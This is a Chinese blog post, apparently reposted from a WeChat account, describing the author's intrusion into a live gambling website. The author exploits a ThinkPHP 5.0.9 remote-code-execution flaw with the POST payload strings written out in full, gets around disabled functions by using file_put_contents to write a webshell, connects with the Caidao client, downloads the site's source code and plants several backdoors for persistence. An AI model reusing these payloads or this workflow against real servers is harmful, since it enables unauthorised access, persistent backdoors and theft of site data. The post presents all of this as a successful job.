成功入侵BC赌博站点植入后门

admin 2021年5月29日04:12:01评论164 views字数 665阅读2分13秒阅读模式

成功入侵BC赌博站点植入后门

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标
主站:

成功入侵BC赌博站点植入后门

通过旁站:

成功入侵BC赌博站点植入后门

信息收集
通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

成功入侵BC赌博站点植入后门

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

成功入侵BC赌博站点植入后门

发现是php 5.4.45版本的,

直接尝试getshell:

成功入侵BC赌博站点植入后门

发现system被禁用,尝试其他系统命令的也一样。

成功入侵BC赌博站点植入后门

查看phpinfo中desable_functions禁用了那些函数。

成功入侵BC赌博站点植入后门

想办法怎么绕过进行写马(此处卡了我半天)
最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!


getshell
构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','')

成功入侵BC赌博站点植入后门

写入成功,利用菜刀连接。

成功入侵BC赌博站点植入后门

成功连接。
查看权限:

成功入侵BC赌博站点植入后门

发现启动了远程安全模式。
想要绕过,发现很多函数被禁用,占未成功。
下载源码:

成功入侵BC赌博站点植入后门

多部署一些后门,防止被删。


END

成功入侵BC赌博站点植入后门


本文始发于微信公众号(网络侦查研究院):成功入侵BC赌博站点植入后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月29日04:12:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   成功入侵BC赌博站点植入后门http://cn-sec.com/archives/280074.html

发表评论

匿名网友 填写信息